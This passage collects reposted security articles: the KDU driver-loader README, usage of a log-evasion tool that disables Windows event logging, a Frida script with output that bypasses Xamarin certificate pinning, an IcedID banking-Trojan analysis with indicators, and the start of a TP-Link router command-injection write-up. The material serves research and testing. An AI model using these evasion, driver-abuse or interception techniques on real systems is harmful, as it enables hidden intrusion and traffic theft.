PASSIVE_LEVEL. After that hijacked Process Explorer driver will be unloaded together with vulnerable provider driver. This entire idea comes from malicious software of the middle of 200x known as rootkits. Build KDU comes with full source code. In order to build from source you need Microsoft Visual Studio 2019 and later versions. For driver builds you need Microsoft Windows Driver Kit 10 and/or above. Support and Warranties Using this program might render your computer into BSOD. Compiled binary and source code provided AS-IS in help it will be useful BUT WITHOUT WARRANTY OF ANY KIND. Third party code usage TinyAES, https://github.com/kokke/tiny-AES-c References DSEFix, https://github.com/hfiref0x/DSEFix Turla Driver Loader, https://github.com/hfiref0x/TDL Stryker, https://github.com/hfiref0x/Stryker Unwinding RTCore, https://swapcontext.blogspot.com/2020/01/unwinding-rtcore.html CVE-2019-16098, https://github.com/Barakat/CVE-2019-16098 CVE-2015-2291, https://www.exploit-db.com/exploits/36392 CVE-2018-19320, https://seclists.org/fulldisclosure/2018/Dec/39 ATSZIO64 headers and libs, https://github.com/DOGSHITD/SciDetectorApp/tree/master/DetectSciApp ATSZIO64 ASUS Drivers Privilege Escalation, https://github.com/LimiQS/AsusDriversPrivEscala CVE-2019-18845, https://www.activecyber.us/activelabs/viper-rgb-driver-local-privilege-escalation-cve-2019-18845 DEFCON27: Get off the kernel if you cant drive, https://eclypsium.com/wp-content/uploads/2019/08/EXTERNAL-Get-off-the-kernel-if-you-cant-drive-DEFCON27.pdf Wormhole drivers code They are used in multiple products from hardware vendors mostly in unmodified state. They all break OS security model and additionally bugged. Links are for educational purposes of how not to do your drivers. Note that following github accounts have nothing to do with these code, they are just forked/uploaded it. WinIo 3.0 BSOD/CVE generator, https://github.com/starofrainnight/winio/blob/master/Source/Drv/WinIo.c WinRing0 BSOD/CVE generator, https://github.com/QCute/WinRing0/blob/master/dll/sys/OpenLibSys.c Authors (c) 2020 KDU Project Sursa: https://github.com/hfiref0x/KDU
  14. Ghost In The Logs This tool allows you to evade sysmon and windows event logging, my blog post about it can be found here Usage You can grab the lastest release here Starting off Once you've got the latest version execute it with no arguments to see the avalible commands $ gitl.exe Loading the hook $ gitl.exe load Enabling the hook (disabling all logging) $ gitl.exe enable Disabling the hook (enabling all logging) $ gitl.exe disable Get status of the hook $ gitl.exe status Prerequisites High integrity administrator privilages Credits Huge thanks to: hfiref0x for the amazing KDU everdox for the super cool InfinityHook Sursa: https://github.com/bats3c/ghost-in-the-logs/
  15. Bypassing Xamarin Certificate Pinning on Android by Alexandre Beaulieu | Apr 6, 2020 Xamarin is a popular open-source and cross-platform mobile application development framework owned by Microsoft with more than 13M total downloads. This post describes how we analyzed an Android application developed in Xamarin that performed HTTP certificate pinning in managed .NET code. It documents the method we used to understand the framework and the Frida script we developed to bypass the protections to man-in-the-middle (MITM) the application. The script’s source code, as well as a sample Xamarin application, are provided for testing and further research. When no Known Solution Exists During a recent mobile application engagement, we ran into a challenging hurdle while setting up an HTTPS man-in-the-middle with Burp. The application under test was developed with the Xamarin framework and all our attempts at bypassing the certificate pinning implementation seemed to fail. Using one of the several available pinning bypass Frida scripts, we were able to intercept traffic to some telemetry sites, but the actual API calls of interest were not intercepted. Searching the Internet for similar work led us to a Frida library, frida-mono-api, which adds basic capabilities to interface with the mono runtime and an article describing how-to exfiltrate request signing keys in Xamarin/iOS applications. With the lack of an end-to-end solution, it quickly started to feel like a DIY moment. Building a Test Environment The first step taken to tackle the problem was to learn as much as possible about Xamarin, Mono and Android by re-creating a very simple application using the Visual Studio 2019 project template and implementing certificate pinning. This approach is interesting for multiple reasons: Learn Xamarin from a developer’s perspective; Solidify understanding of the framework; Reading documentation will be required regardless; Sources are available for debugging. An additional benefit was that the application developed as part of this exploration phase could be used for demonstration purposes and to reliably validate our attempts to bypass certificate pinning. For this reason alone, the time spent upfront on development was more than worth it. The logical progression towards a working bypass can be outlined as follows Identify the interfaces that allow to customize the certificate validation routines; Identify how they are used by typical code bases; Determine how to alter them at runtime in a stable fashion; Write a proof of concept script and test it against the demo application. Another important objective that we had with this work was that any improvements towards Mono support in Frida should be a contribution to existing projects. Down the Rabbit Hole After setting up an Android development environment inside a Windows VM and following along with the Xamarin Getting Started guide, we were able to build and sign a basic Android application. With the application working, we implemented code simulating a certificate pinning routine as shown in listing 1: A handler that flags all certificates as invalid. If we’re able to bypass this handler, then it implies that we should also be able to bypass a handler that verifies the public key against a hardcoded one. Listing 1 – The simplest certificate “validation” handler. static class App { // Global HttpClient as per MSDN: // https://docs.microsoft.com/en-us/dotnet/api/system.net.http.httpclient public static readonly HttpClient Http {get; private set;} static App() { var h = new HttpClientHandler(); h.ServerCertificateCustomValidationCallback = ValidateCertificate; Http = new HttpClient(hh); } // This would normally check the public key with a hardcoded key. // Here we simulate an invalid certificate by always returning false. private static bool ValidateCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) => false; } // ... // Elsewhere in the code. private async void MakeHttpRequest(object obj) { // ... var r = await App.Http.GetAsync("https://www.example.org"); // ... } Xamarin Concepts Xamarin is designed to provide cross-platform support for Android and iOS and minimize code duplication as much as possible. The UI code uses Microsoft’s Window Presentation Framework (WPF) which is an arguably nice way to program frontend code. There are two major components in any given Xamarin application: A shared library with the common functionality that does not rely on native operating system features and a native application launcher project specific to each supported target operating system. In practice, this means that there are at least three projects in most Xamarin applications: The shared library, an Android launcher, and an iOS launcher. Application code is written in C# and uses the .NET Framework implementation provided by Mono. The code output is generated as a regular .NET assembly (with the .dll extension) and can be decompiled reliably (barring obfuscation) with most type information kept intact using a decompiler, such as dnSpy. Xamarin has support for three compilation models provided by the underlying Mono framework: Just-in-Time (JIT): Code is compiled lazily as required Partial Ahead-of-Time compilation (AOT): Code is natively compiled ahead-of-time during build for compiler-selected methods Full AOT: All Intermediate Language (IL) code is compiled to native machine code (required for iOS) The Mono Runtime The Mono runtime is responsible for managing the memory heaps, performing garbage collection, JIT compiling methods when needed, and providing native functionality access to managed C# code. The runtime tracks metadata about all managed classes, methods objects, fields, and other states from the Xamarin application. It also exports a native API that enables native code to interact with managed code. While most of these methods are documented, some of them have empty or incomplete document strings and diving into the codebase has proven to be necessary multiple times while developing the Frida script. Mono uses a tiered compilation process, which will become relevant later as we describe the implementation of certificate pinning. In the pure JIT case, a method starts off as IL bytecode, which gets a compilation pass on the initial call. The resulting native code is referred to as the tier0 code and is cached in memory for re-use. When a method is deemed critical, the JIT compiler can decide to optimize it and recompile it using more aggressive optimizations. Mono is in fact much more complex than described here, but this overview covers the basics needed to understand the Frida script. Hijacking Certificate Validation Callbacks .NET has evolved over time and there are two entry points to override certificate validation routines, depending on whether .NET Framework or .NET Core is being used. Mono has recently moved to .NET Core APIs and rendered the .NET Framework method ineffective. Prior to .NET Core (and Mono 6.0), validation occurs through System.Net.ServicePointManager.ServerCertificateValidationCallback, which is a static property containing the function to call when validating a certificate. All HttpClient instances will call the same function, so only one function needs to be hooked. Starting with .NET Core, however, the HTTP stack has been refactored such that each HttpClient has its own HttpClientHandler exposing a ServerCertificateCustomValidationCallback property. This handler is injected into the HttpClient at construction time and is frozen after the first HTTP call to prevent modification. This scenario is much more difficult as it requires knowledge of every HttpClient instance and their location in memory at runtime. Listing 2 – Certificate validation callback setter preventing callback hijacking // https://github.com/mono/mono/blob/mono-6.8.0.96/mcs/class/System.Net.Http/HttpClientHandler.cs#L93 class HttpClientHandler { public Func<HttpRequestMessage, X509Certificate2, X509Chain, SslPolicyErrors, bool> ServerCertificateCustomValidationCallback { get { return (_delegatingHandler.SslOptions.RemoteCertificateValidationCallback? .Target as ConnectHelper.CertificateCallbackMapper)? .FromHttpClientHandler; } set { ThrowForModifiedManagedSslOptionsIfStarted (); // <---- Validation here _delegatingHandler.SslOptions .RemoteCertificateValidationCallback = value != null ? new ConnectHelper.CertificateCallbackMapper(value) .ForSocketsHttpHandler : null; } } } As seen in the previous listing, setting the callback after a request has been sent will throw an exception and most likely cause the application to crash. Fortunately for us, the base class of HttpClient is HttpMessageInvoker which contains a mutable reference to the HttpClientHandler that will perform the certificate validation so it’s possible to safely change the whole handler: Listing 3 – HttpMessageInvoker request dispatch mechanism // https://github.com/mono/mono/blob/mono-6.8.0.96/mcs/class/System.Net.Http/System.Net.Http/HttpMessageInvoker.cs public class HttpMessageInvoker : IDisposable { protected private HttpMessageHandler handler; readonly bool disposeHandler; // ... public virtual Task SendAsync (HttpRequestMessage request, CancellationToken cancellationToken) { return handler.SendAsync (request, cancellationToken); } } Hooking Managed Methods In the ServicePointManager case, intercepting the callback is as simple as hooking the static property’s get and set methods, so it will not be covered explicitly but is included with the bypass Frida script we are providing. Let’s focus on the more interesting HttpClientHandler case, which requires more than just method hooking. The idea is to replace the HttpClientHandler instance by one that we control that restores the default validation routine. To do this, we can hook the HttpMessageInvoker.SendAsync implementation and replace the handler immediately before it gets called. Now, SendAsync is a managed method, so it could be in any given state at any given moment: Not yet JIT compiled: The native code for hooking does not exist Tier0 compiled: We can hook the method if we can find its address AOT compiled: The method is in a memory mapped native image To make matters trickier, if the Mono runtime were to decide to optimize a method that we hooked, it is likely that our hook might be removed in the newly generated code. Thankfully, the native function mono_compile_method allows us to take a class method and force the JIT compilation process. However, it is not clear whether the method is tier 0 compiled or optimized, so there could still potentially be issues with optimizations. The return value of mono_compile_method is a pointer to the cached native code corresponding to the original method, making it very straightforward to patch using existing Frida APIs. Putting the Pieces Together We forked frida-mono-api project as a starting point and added some new export signatures, along with the JIT compilation export and a MonoApiHelper method to wrap the boilerplate required to hook managed methods. The resulting code is very clean and in theory should allow to hook any managed method: Listing 4 – Support for managed method hooking in frida-mono-api function hookManagedMethod(klass, methodName, callbacks) { // Get the method descriptor corresponding to the method name. let md = MonoApiHelper.ClassGetMethodFromName(klass, methodName); if (!md) throw new Error('Method not found!'); // Force a JIT compilation to get a pointer to the cached native code. let impl = MonoApi.mono_compile_method(md) // Use the Frida interceptor to hook the native code. Interceptor.attach(impl, {...callbacks}); } With the ability to hook managed methods, we can implement the approach described above and test the script on a rooted Android device. Listing 5 – Final certificate pinning bypass script import { MonoApiHelper, MonoApi } from 'frida-mono-api' const mono = MonoApi.module // Locate System.Net.Http.dll let status = Memory.alloc(0x1000); let http = MonoApi.mono_assembly_load_with_partial_name(Memory.allocUtf8String('System.Net.Http'), status); let img = MonoApi.mono_assembly_get_image(http); let hooked = false; let kHandler = MonoApi.mono_class_from_name(img, Memory.allocUtf8String('System.Net.Http'), Memory.allocUtf8String('HttpClientHandler')); if (kHandler) { let ctor = MonoApiHelper.ClassGetMethodFromName(kHandler, 'CreateDefaultHandler'); // Static method -> instance = NULL. let pClientHandler = MonoApiHelper.RuntimeInvoke(ctor, NULL); console.log(`[+] Created Default HttpClientHandler @ ${pClientHandler}`); // Hook HttpMessageInvoker.SendAsync let kInvoker = MonoApi.mono_class_from_name(img, Memory.allocUtf8String('System.Net.Http'), Memory.allocUtf8String('HttpMessageInvoker')); MonoApiHelper.Intercept(kInvoker, 'SendAsync', { onEnter: (args) => { console.log(`[*] HttpClientHandler.SendAsync called`); let self = args[0]; let handler = MonoApiHelper.ClassGetFieldFromName(kInvoker, '_handler'); let cur = MonoApiHelper.FieldGetValueObject(handler, self); if (cur.equals(pClientHandler)) return; // Already bypassed. MonoApi.mono_field_set_value(self, handler, pClientHandler); console.log(`[+] Replaced with default handler @ ${pClientHandler}`); } }); console.log('[+] Hooked HttpMessageInvoker.SendAsync'); hooked = true; } else { console.log('[-] HttpClientHandler not found'); } Running the script gives the following output: $ frida -U com.test.sample -l dist/xamarin-unpin.js --no-pause ____ / _ | Frida 12.8.7 - A world-class dynamic instrumentation toolkit | (_| | > _ | Commands: /_/ |_| help -> Displays the help system . . . . object? -> Display information about 'object' . . . . exit/quit -> Exit . . . . . . . . More info at https://www.frida.re/docs/home/ Attaching... [+] Created Default HttpClientHandler @ 0xa0120fc8 [+] Hooked HttpMessageInvoker.SendAsync with DefaultHttpClientHandler technique [-] ServicePointManager validation callback not found. [+] Done! Make sure you have a valid MITM CA installed on the device and have fun. [*] HttpClientHandler.SendAsync called [+] Replaced with default handler @ 0xa0120fc8 As seen above, the SendAsync hook has worked as expected and the HttpClientHandler got replaced by a default handler. Subsequent SendAsync calls will check the handler object and avoid replacing it if it is already hijacked. The screen capture below shows the sample application making a request before and after running the bypass script. The first request gives an SSL exception (as expected) because of the installed callback that always returns false. The second request triggers the hook, which replaces the client handler and returns execution to the HTTP client, hijacking the validation process generically for any HttpClient instance without having to scan memory to find them. Conclusion Xamarin and Mono are quickly evolving projects. This technique appears to work very well with the current (Mono 6.0+) framework versions but might require some modifications to work with older or future versions. We hope that sharing the method used to understand and tackle the problem will be useful to the security community in developing similar methods when performing mobile testing engagements. The complete repository containing the code and pre-build Frida scripts can be found on Github. Future Work The Frida script has been tested on our sample application with regular build options, without ahead-of-time compilation and with the .NET Core method (HttpClientHandler) and works reliably. There are however many scenarios that can occur with Xamarin and we were not able to test all of them. More specifically, any of the following has not been tested and could be an area of future development: .NET Framework applications which use ServicePointManager iOS Applications with Full AOT Android Applications with Partial AOT Android Applications with Full AOT If you try the script and run into issues, please open a bug on our issue tracker so we can improve it. Even better, if you end up fixing some issues, we’d be happy to merge your pull requests. And lastly, if you have APKs for one of the untested scenarios and feel like sharing them with us, it will help us ensure that the script works in more cases. References Mono Runtime Documentation: https://www.mono-project.com/docs/advanced/runtime/docs/ Mono Compilation Modes: https://www.mono-project.com/docs/advanced/aot/ Mono on Github: https://github.com/mono/mono ServicePointManager deprecation: https://github.com/xamarin/xamarin-android/issues/3682#issuecomment-535679023 Mono Tiered Compilation: https://github.com/mono/mono/issues/16018 Code Release: https://github.com/GoSecure/frida-xamarin-unpin Fridax – A Xamarin hacking framework: https://github.com/NorthwaveNL/fridax Sursa: https://www.gosecure.net/blog/2020/04/06/bypassing-xamarin-certificate-pinning-on-android/
  16. Breaking the Ice: A Deep Dive Into the IcedID Banking Trojan’s New Major Version Release April 1, 2020 | By Nir Somech co-authored by Limor Kessem | 14 min read The IcedID banking Trojan was discovered by IBM X-Force researchers in 2017. At that time, it targeted banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, mainly in the U.S. IcedID has since continued to evolve, and while one of its more recent versions became active in late-2019, X-Force researchers have identified a new major version release that emerged in 2020 with some substantial changes. This post will delve into the technical details of IcedID version 12 (0xC in hexadecimal). Before we delve into the technical details, here are the components that saw changes applied in this new version: New anti-debugging and anti-VM checks. Modified infection routine and file location on disk. Hiding encrypted payload in .png file (steganography). Modification of code injection tactics. Modified cryptographic functions. In this post, you will also find information on IcedID’s naming algorithms that are used for creating names for its various files, events, and resources. We also mention how to find and extract the malware’s internal version number. IcedID’s Entry Point – Targeted Maldocs via Other Malware IcedID is spread via malspam emails typically containing Office file attachments. The files are boobytrapped with malicious macros that launch the infection routine, fetch and run the payload. In February 2020 campaigns, maldocs spread in spam first dropped the OStap malware, which then dropped IcedID. OStap was also a vehicle for TrickBot infections in recent months. IcedID has a connection to the Emotet gang, having been dropped by Emotet in the past. Attack Turf IcedID’s targeting has been consistent since it emerged. Its focus remains on the North American financial sector, e-commerce, and social media. IcedID targets business users and business banking services. IcedID’s Loader’s Behavior Upon the first time running the loader in our labs, we observed that it performs a few actions before deciding whether to infect the machine or not. It begins by loading encrypted code from the resource section, decrypts it and executes. Figure 1: IcedID loader running encrypted code As part of the code being executed, the loader uses some newly added anti-VM & anti-debugging techniques in order to check if it’s being run in a VM or a sandbox. The output of these checks, alongside other parameters, is then sent to the attacker’s command and control (C&C/C2) server to determine if the victim’s machine should be infected or not.If the malware is to proceed to infect the machine, the C2 server sends back the necessary files to execute, like the malware’s configuration file, the actual malicious payload (saved as encrypted and packed .png file[1]) and a few other accompanying files.The loader then copies itself into two locations: C:\ImgContent\ [1] Hiding code inside an image is a technique known as steganography. Figure 2: IcedID loader copies itself to local disk %appdata%\local\[user]\[generated_name]\ Figure 3: IcedID loader copies itself to a second location on the local disk Next, in order to maintain persistency on the victim’s machine, the malware creates a task in the task scheduler triggering a run of the loader at log on and every hour. Figure 4: IcedID task scheduler Figure 5: IcedID task scheduler After copying itself to these two locations and after creating the persistency mechanism, it executes couple of anti-VM and anti-debugging checks to allow the C2 to ‘approve’ proceeding to infect the machine. The loader downloads all the necessary files in order to execute. In the next section, we will go over the anti-VM and anti-debugging checks the loader performs. One of the important files the loader fetches is the malicious payload that contains all of IcedID’s logic and which is actually the main module of the malware. It saves this core module under the path “%appdata%\local\user_name\photo.png“. This file is initially encrypted and packed. The path and the file name of the downloaded payload are both hardcoded. Figure 6: IcedID is saved as a packed, encrypted image The loader reads the downloaded payload, which is saved as an encrypted .png file, then decrypts it, and will later inject it to a newly created svchost process. Figure 7: Loader reads IcedID payload Next, the loader creates a new process, svchost, and injects the decrypted IcedID payload into it. Figure 8: Process injection into a svchost process IcedID’s Injected Payload IcedID’s actual payload starts executing once it is injected to a newly created svchost process. Since the injected IcedID payload is originally packed, it begins by unpacking itself. After unpacking itself, the core IcedID module performs some initialization steps in order to run properly. It downloads and reads different files necessary for the execution flow, like the configuration file (chercrgnaa.dat in this case), certificate file (3D8C2D77.tmp in this case), and other supporting resources. Figure 9: IcedID payload launched into action The IcedID module checks to make sure there is no other instance of that same file and that it is not already running[1], gets some information about the victim’s system, checks the versioning, sends some information to the C2 and starts scanning for running browser processes in order to inject its payload into them and hook them. The browser hooking will allow IcedID to detect targeted URLs and deploy web-injections accordingly. Infection process via loader and IcedID payload: The loader communicates with the C2 to fetch the IcedID payload The downloader downloads the malicious payload – a file named photo.png* The loader runs photo.png The loader creates a new instance of svchost.exe Loader injects the malicious payload into the new svchost.exe process The second step in the list above happens only the first time the malware is run, or when it updates and downloads a newer version of the malicious payload, photo.png. That happens because after downloading the photo.png file, it saves it to a disk so that every time the malware is launched, it simply has to load the file from the disk into memory. [1] See the naming algorithms section – svchost mutex name – for more information. Figure 10: Infection process via loader and IcedID payload Anti-VM and Anti-Debugging Tactics IcedID’s new version has been upgraded with additional abilities to hide itself and detect when it is being run in a virtual environment or in debug mode. In previous versions, this malware did not feature these evasion techniques. The checks start with the loader that’s programmed to identify if it is running in a virtualized environment or under a debugger. In the images below, we can see the function named “anti_vm” that checks whether the malware is running in an emulator. The loader also uses some anti-debugging and anti-VM instructions such as the Read-Time-Stamp-Counter instruction (RDTSC), which can help it detect if a researcher is pausing the debugger in different steps., if it is being run under a debugger. It uses CPUID with 0x40000000 as a parameter looking for hypervisor brands, CPUID and more. We can see in the image below that the loader runs in a loop 255 times. Inside the loop, it executes the RDSTC instruction at both the beginning and at the end of the loop, and in between it executes the command CPUID with 0x01 as a parameter. Figure 11: Using the RDTSC instruction to detect running under debug mode Usually, the output of the CPUID instruction with 0x01 as a parameter is used to detect VMs, but here it ignores the output and only calculates the time difference between the first and the second calls of RDSTC. Depending on the calculated delta, the loader increments the relevant counter: 0 < Difference < 250? ++less_250_miliseconds 250 < Difference < 500? ++less_500_miliseconds 500 < Difference < 750? ++less_750_miliseconds 750 < Difference < 1000? ++less_1000_miliseconds else? ++Big_Gap Next, the malware performs yet another test in order to validate if it is running in a VM or on a physical machine: Figure 12: Malware checking if it is being run in a test environment It calls CPUID with 0x40000000 as a parameter and the output is a value that indicates the VM vendor brand and type when it is run inside a virtual machine: VMM_XEN: ebx = 0x566e6558 and ecx = 0x65584d4d and edx = 0x4d4d566e VMM_HYPER_V: ebx = 0x7263694D and ecx = 0x666F736F and edx = 0x76482074 VMM_VMWARE: ebx = 0x61774d56 and ecx = 0x4d566572 and edx = 0x65726177 VMM_KVM: ebx = 0x4b4d564b and ecx = 0x564b4d56 and edx = 0x0000004d All this collected data is later sent to the C2 server to help determine if the malware is being run in a VM or debugged environment. According to the output, the C2 server decides whether to send all the files necessary to infect the machine and run the IcedID core module. Code Injection Techniques IcedID has two code injection methods. The first injection method is used when the malware is launched for the first time or at system start-up. This first method injects code into a spawned svchost.exe process. The second injection method takes place when the malware detects that a browser process is running in the background and injects its shellcode to that running browser process. IcedID uses a slight code obfuscation to make it difficult to analyze. The code obfuscation works by calling Windows API functions indirectly instead of calling the functions directly using dynamically loading the Windows API functions it calls into Registers. Let’s look at these two techniques more visually. IcedID has two code injection methods. IcedID’s Svchost Process Injection Method In the first code injection type, the malware begins by creating a svchost process in suspend state. Figure 13: IcedID code injection process Figure 14: IcedID code injection process Next, it allocates memory in the target process (svchost.exe) and injects its shellcode into the allocated memory. It then changes the protection flag of the allocated memory space to PAGE_READ_EXECUTE. Next, it calls the function “NtQueueApcThread” with the main thread of the injected process and the entry point address in the injected shellcode. At the end of the injection process, it calls “NtResumeThread” in order to run its own code in the now injected process (svchost.exe). Figure 15: IcedID code injection process Figure 16: IcedID code injection process Figure 17: IcedID code injection process Figure 18: IcedID code injection process Svchost –> Browser Injection Method This second case takes place when the malicious svchost process detects that a browser process was launched. It gets a handle to the process and calls the function “Inject_browser” as shown in the figure below. Figure 19: IcedID browser injection process Inside “Inject_browser” it calls three functions — “ZwWritevirtualMemory”, “NtProtectVirtualMemory” and “ZwAllocatevirtualMemory” — in order to inject its shellcode into the browser’s process. After injecting the shellcode into the browser process, it calls “CreateRemoteThread” with the entry point address in the injected shellcode. Figure 20: IcedID browser injection process Figure 21: IcedID browser injection process Figure 22: IcedID browser injection process IcedID’s Cryptographic Choices and Techniques IcedID uses a few different decryption and decoding algorithms to hide some artefacts that can help malware researchers understand the context of its functions and operational flow. The cryptographic functions are being used in all processes that IcedID creates or injects, namely svchost and web browser processes. IcedID’s cryptography functions are as follows: 1. Decode (int a1) Usually used with other decryption algorithms — for example, the algorithms that decode browser event name or mutex in svchost process. The function gets one argument, an integer, and runs a few bitwise operations on this parameter. Figure 23: IcedID decoding function Decode (int a1) 2. Decrypt (int key, string encrypted_string) Usually used to decrypt encrypted strings and artefacts in the code in order to harden the reverse-engineering process. The function gets two arguments: key (integer) and string to decrypt (string). This function remains unchanged from the last version of IcedID. Figure 24: IcedID decryption function 3. Decode_by_constant (int key, char[] arr) Responsible for generating event names for browser processes that IcedID manages to infect. The function gets two arguments: constant\key (integer) and array (char[]). Figure 25: IcedID Decode_by_constant function 4. CreateGlobalKey (string sid) Creates a global key that is then used for other encryption and decryption algorithms and for naming algorithms. This function gets one argument: the system ID (SID) of the infected user’s device. The algorithm being used here is the Fowler–Noll–Vo hash. Figure 26: IcedID using the Fowler–Noll–Vo hash non-cryptographic hash function 5. RC4_variant (int[] arr) This function is responsible for decrypting encrypted files, such as configuration files, the encrypted payload downloaded from the C2, the code loaded and injected to the svchost process, and more. This encryption/decryption algorithm is an RC4 cipher variant that continues to use the string ‘zeus’ as the keyword like it does in previous versions. There were slight changes in the RC4 cipher in this version which means that standard RC4 decryption algorithms in Python libraries will not work against only the RC4-encrypted data because it has been customized by IcedID’s developers. A custom or modified RC4 decryptor would have to be used to decrypt new configurations. The function gets one argument – an array – that contains the encrypted payload to decrypt. Figure 27: IcedID using the RC4 stream cipher to encrypt/decrypt resources 6. initKey (int GlobalKey, int constant, int[] key) Initializes the key for the RC4 variant decryption algorithm. It gets three parameters: the GlobalKey (integer), constant (integer) and an array of integer/chars. Figure 28: IcedID initKey function IcedID’s Naming Algorithms IcedID uses a few naming algorithms in order to generate names for its files, directories, mutexes, events, etc. Here are some of the different uses of IcedID’s naming algorithms: 1. Browser Event Name When the malware injects itself into a new browser process, it creates an event in order to know that this browser process has already been injected. It uses the function “decode_by_constant(int key, char[] arr)” in order to generate the event name. The event name is similar for all types of browsers. For the event name created in the browser, the key is hardcoded with the value 6 (key = 6). Figure 29: IcedID uses a naming algorithm to generate names for events 2. Svchost Mutex Name When the malware is injected into a svchost process that it created, it also creates a mutex in order to know that this svchost process has already been injected. In the image below, we can see the “create_mutex_svchost” function. At the beginning of the function, it calls the function “generate_mutex_name” and generates the name of the mutex that will be created. The function has two parameters: key, which is the hardcoded value 7, and array, which will contain the generated name. Figure 30: IcedID uses a naming algorithm to name mutexes it creates The function “generate_mutex_name” first calls the function “mutex_name” with key=7 and an empty array that will contain the characters used for the mutex name. Next, it calls the function “decrypt” with the encrypted “mutex_name_format” string. Finally, it prints and returns the mutex name to the array it got as an argument. Figure 31: IcedID mutex naming technique The function “mutex_name” gets as arguments a key (key=7) and array that will contain the resulting mutex name. It runs a few bitwise operations on the argument key and the globalkey/init_key. The result of this bitwise operation is the svchost mutex name. Figure 32: IcedID mutex naming technique 3. Configuration File Paths First, the malware retrieves the “appdata\local\” path by calling the function SHGetFolderPathW with 0x1c as a parameter, as pictured below in Figure 33 (circled in black). Next, it calls the function Decode_by_constant(key, arr) with key=4. The return value is the name of the folder in “appdata\local\”, as pictured below in Figure 33 (circled in gray). There are two configuration files in the configuration folder, both with .dat extensions. In order to generate the file names, IcedID performs the following steps: Each of the files has an initial constant value (0 and 1) and the malware runs some bitwise operations on them and gets an integer as a result (5 and 261), as pictured below in Figure 33 (circled in red). Next, it takes the generated value and calls the function Decode_by_constant(key, arr) with key=generated_value. The returned value is the first X letters in X+2 letters of the T configuration file, as pictured below in Figure 33 (circled in red). The last two characters of the configuration file’s name are generated by executing bitwise operations on the initial value related to the file, as pictured below in Figure 33 (circled in yellow). Figure 33: IcedID configuration files path definition Figure 34: IcedID configuration files IcedID’s Certificate Files The IcedID version we examined stores certificate files related to the malware under “appdata\local\Temp” with the same name as the global key the malware generates. The suffix of the certificate file is .tmp. Figure 35: IcedID certificate files stored as .tmp files IcedID’s Configuration Files IcedID downloads configuration files from the C&C. The configuration files contain targeted banks and retailers, and the payload injected into the browser processes. Figure 36: IcedID configuration files IcedID’s Code Versioning IcedID’s developers continuously update its code over time. While bug fixes are naturally more frequent, we also see the occasional release of a new major version. This malware’s version number is hardcoded and resides in the encrypted photo.png file. We can see the version number in the malicious svchost process by looking at the function that contains the main logic of the malware. Figure 37: IcedID version number is a part of its code Circled in red in Figure 37 above, we can see the sample version: 12 (0xC in hexadecimal). Browser Hooking When IcedID detects a browser process running in the system, it injects its malicious payload into the browser process and hooks relevant functions. Some of the targeted functions are Windows API functions, such as those from the kernel32, crypt32, WinINet and ws2_32 dynamic link libraries and some related to the browser vendor. Figure 38: Browser hooked functions IcedID Still in the Cybercrime Game IcedID emerged in 2017 and continues to evolve its capabilities. While it has not been the most active malware over the past three years, its low activity volumes are mostly attributed to its continued focus on the same attack turf: North America. And while it has not topped the charts of 2019’s most prevalent banking Trojans, it has consistently been targeting banks and retailers, and receives updates to the mechanisms that allow it to keep working on devices that get updated over time. Figure 39: Top banking Trojans in 2019 (Source: IBM X-Force) With its known connections to elite cybercrime gangs originating in Russia and other parts of Eastern Europe, the IcedID Trojan, and the group that operates it, are likely to continue to be part of the cybercrime arena. Interestingly, while we have been observing different gangs in this sphere diversify their revenue models to include high-stakes ransomware attacks, IcedID has not been part of the same trend so far. Will it follow in the footsteps of its counterparts? We will be following the trend as it evolves. To stay up to date on IcedID and other malware and receive technical updates on the threat landscape, read IBM X-Force research blogs on Security Intelligence and visit X-Force Exchange. IOCs MD5s: Loader: 9C8EF9CCE8C2B7EDA0F8B1CCDBE84A14 Payload: 925689582023518E6AA8948C3F5E7FFE Connections: hxxp://www.hiperdom[.]top hxxp://www.gertuko[.]top File Paths: C:\Users\[user]\AppData\Local\”generated name” C:\Users\[user]\AppData\Local\”user name” C:\Users\[user]\AppData\Local\Temp Sursa: https://securityintelligence.com/posts/breaking-the-ice-a-deep-dive-into-the-icedid-banking-trojans-new-major-version-release/
  17. Exploiting the TP-Link Archer A7 at Pwn2Own Tokyo April 07, 2020 | Guest Blogger SUBSCRIBE During the Pwn2Own Tokyo competition last fall, Pedro Ribeiro (@pedrib1337) and Radek Domanski (@RabbitPro) used a command injection vulnerability as a part of the exploit chain they used to gain code execution on a TP-Link Archer A7 wireless router, which earned them $5,000. The bug used in this exploit was recently patched, and Pedro and Radek have graciously put together this blog post describing the command injection vulnerability. This article describes a command injection vulnerability that we found and presented at the Pwn2Own Tokyo competition in November 2019. The vulnerability exists in the tdpServer daemon (/usr/bin/tdpServer), running on the TP- Link Archer A7 (AC1750) router, hardware version 5, MIPS Architecture, firmware version 190726. This vulnerability can only be exploited by an attacker on the LAN side of the router, but authentication is not necessary. After exploitation, an attacker is able to execute any command as root, including downloading and executing a binary from another host. This vulnerability was assigned CVE-2020-10882 and was addressed by TP-Link with firmware version A7(US)_V5_200220. All function offsets and code snippets in this article are taken from /usr/bin/tdpServer, firmware version 190726. Background on tdpServer The tdpServer daemon listens on UDP port 20002 on interface 0.0.0.0. The overall functionality of the daemon is not fully understood by the authors at this point, as this was unnecessary for exploitation. However, the daemon seems to be a bridge between the TP-Link mobile application and the router, allowing establishment of some sort of control channel from the mobile application. The daemon communicates with the mobile application through the use of UDP packets with an encrypted payload. We reversed the packet format, and it is shown below: Figure 1 - Reversed tdpServer packet format The packet type determines what service in the daemon will be invoked. A type of 1 will cause the daemon to invoke the tdpd service, which will simply reply with a packet with a certain TETHER_KEY hash value. Because this is not relevant to the vulnerability, we did not investigate it in detail. The other possible type is 0xf0, which invokes the onemesh service. This service is where the vulnerability lies. OneMesh appears to be a proprietary mesh technology that was introduced by TP-Link in recent firmware versions for a number of their routers. The other fields in the packet are relatively well explained in the comments above. Understanding the Vulnerability Upon device start-up, the first relevant function invoked is tdpd_pkt_handler_loop() (offset 0x40d164), which opens a UDP socket listening on port 20002. Once a packet is received, this function passes the packet to tpdp_pkt_parser() (0x40cfe0), of which a snippet is shown below: Figure 2 - tdpd_pkt_parser() #1 In this first snippet, we see that the parser first checks to see if the packet size as reported by the UDP socket is at least 0x10, which is the size of the header. Then it invokes tdpd_get_pkt_len() (0x40d620), which returns the length of the packet as declared in the packet header (len field). This function returns -1 if the packet length exceeds 0x410. The final check will be done by tdpd_pkt_sanity_checks() (0x40c9d0), which will not be shown for brevity, but does two verifications. First, it checks if the packet version (version field, the first byte in the 